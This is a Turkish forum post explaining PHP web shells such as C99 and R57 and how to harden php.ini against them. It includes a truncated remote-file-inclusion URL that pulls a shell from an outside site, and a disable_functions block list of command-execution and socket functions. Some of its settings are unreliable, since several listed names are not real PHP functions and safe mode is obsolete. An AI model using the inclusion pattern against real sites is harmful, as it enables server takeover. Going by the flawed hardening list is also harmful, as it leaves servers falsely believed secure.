NETForumlari.Com - Forum, Eğlence ve Güncel Paylaşım Platformu  

Geri git   NETForumlari.Com - Forum, Eğlence ve Güncel Paylaşım Platformu > NF - Webmaster Dünyası > vBulletin

Etiketlenen üyelerin listesi

Yeni Konu aç Cevapla
 
Seçenekler Stil
Alt 06 Kasım 2023, 17:59   #1
ZirveChat.Net
 
SynaX - ait Kullanıcı Resmi (Avatar)

Üyelik Tarihi: 23 Ekim 2023
Üye No: 3
Mesajlar: 88
Nerden: Bursa
Meslek: Php,Html
Aldığı Beğeni: 66
Beğendikleri: 35
@SynaX
Standart Shell Nedir? Shellden Korunma Yöntemleri Nelerdir?

1) SHELL NEDİR?

PHP’ nin en büyük sorunlarından biridir. Dosyanın nereden geldiği ya da nasıl geldiği önemli değil önemli olan o dosyanın sunucuda olup olmamasıdır varsa PHP çalıştırma işlemlerini yapacaktır. Kodların işlenmesi ile geçmiş olsun sizde HACKLENDİNİZ! Onun için varsa sunucu şirketiniz ile irtibata geçip birazdan anlatacağım korunma yollarını talep ediniz eğer sunucu sizinse ve “root” yetkilisi sizseniz gerekli savunmayı kendiniz kolaylıkla yapabilirsiniz.-

Başlıca SHELL tipleri, C99, R57, C100, ASPXspy2… devam eder.Bir kaç örnek vermek gerekirse

cL..... adında bir hacker tarafından Kanal 3 hacklenmişti. Burada yaptığı şey yine basit bir shell ile saldırmak olmuştu.

Aynı zaman da bir çok hack timine bağlı insanlar bunu yapmaktadır.

Kısaca özetlemek gerekirsek SHELL sistem de sizi temel yetkilerle yetkilendirir.(Okuma, Yazma, Silme…)

2)SHELL NASIL KULLANILIR?

Bunun bir çok farklı kullanımı bulunmaktadır.Özellikle programcılığın arttığı bu yıllar da bir çok farklı yöntem geliştirildi.Başlıca kullanımlar;

http://www.siteadi.com/index.php?den...z.com/c99.txt?


Bu örnekte index.php’ye c99.txt adlı metni siteden çek bu sayede sitenize c99.txt dosyası upload edildi. PHP değil çalışmaz ki düşüncesine sahip tanıdıklarım olduğu için belirtiyorum. YOK ÖYLE BİR DÜNYA ne yazık ki sistem bu dosyada ki kodları da işliyor. Bazen de upload açıkları oluyor örnek vermek gerekirse bir siteye girdiniz eğer dosyaları kontrol etmeden direk sunucuya taşıyorsa vay haline en fazla bir kaç saat ömrü var demektir. PHP dosyaları her ne olursa olsun sunucuda direkt olarak çalıştırılır.

Sisteme girdikten sonra çıkan ekran;

Bu gördüğünüz bir C99 örneğidir. Sisteme girdikten sonra yalnızca hacker’ın size yapıcağı şovları izlemek ile yetinirsiniz.-


3)Korunma Yolları

İşte şimdi işin en güzel “Gardaş biz bu adamları durduramayız mı?” sorusunun cevabı elbette durdurulur.Zekice planlanmış bir savunma duvarı ile kendinizi en azından “lamer” tabirini kullandığımız 10-16 yaş grubu çocukları sitenizden uzak tutar. Gelelim korumaya;

Sunucuya “ROOT” olarak giriş yapın.(Giriş yapmak için genel de putty kullanılır.)

php.ini dosyasını düzenlemek için pico – vi – ya da nano editörlerinden birini kullanabilirsiniz. Ben pico’yu tercih ediyorum.

Kod
pico /etc/php.ini
yada php ayar dosyasını komutuyla açıyoruz.

Kod
Safe Mod ‘ Off ise Off u Silerek On Yapıyoruz ...
Safe-mode: ON
(secure)
Open Basedir karşısına yazıyoruz .

Kod
Open base dir: /home/yer6tr:/usr/lib/php:/usr/local/lib/php:/tmp
Disable functions : Satırına yapıştırın


Kod
Disable functions : foreach,glob,hopenbasedir,f_open,system,dl,passthru,cat,exec,

popen,proc_close,proc_get_status,proc_nice,proc_open,escapeshellcmd,escapeshellarg,

show_source,posix_mkfifo,mysql_list_dbs,get_current_user,getmyuid,pconnect,link,symlink,

pcntl_exec,ini_alter,parse_ini_file,leak,apache_child_terminate,posix_kill,

posix_setpgid,posix_setsid,posix_setuid,proc_terminate,syslog,fpassthru,stream_select,

socket_select,socket_create,socket_create_listen,socket_create_pair,socket_listen,socket_accept,socket_bind,

socket_strerror,pcntl_fork,pcntl_signal,pcntl_waitpid,pcntl_wexitstatus,pcntl_wifexited,pcntl_wifsignaled,

pcntl_wifstopped,pcntl_wstopsig,pcntl_wtermsig,openlog,apache_get_modules,apache_get_version,apache_getenv,

apache_note,apache_setenv,virtual,user_dir
ctrl+x yazın y tıklayıp enterlayın ardından service htttpd restart yapıyoruz.

Suse ise-
service apache2 restart yapıyoruz.

Bu korumalardan sonra shell yalnızca CHMOD 777 yetkisine sahip olan klasörlere atılabilir halde olucaktır. vBulletin vb. Forum yazılımı kullanıyorsanız Mutlaka Configleri criptolayınız.

 
Alıntı ile Cevapla
Cevapla

Tag Ekle
korunma, nedir?, nelerdir?, shell, shellden, yöntemleri


Konuyu Toplam 1 Üye okuyor. (0 Kayıtlı üye ve 1 Misafir)
 
Seçenekler
Stil

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz yok
You may not post replies
You may not post attachments
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-KodlarıKapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı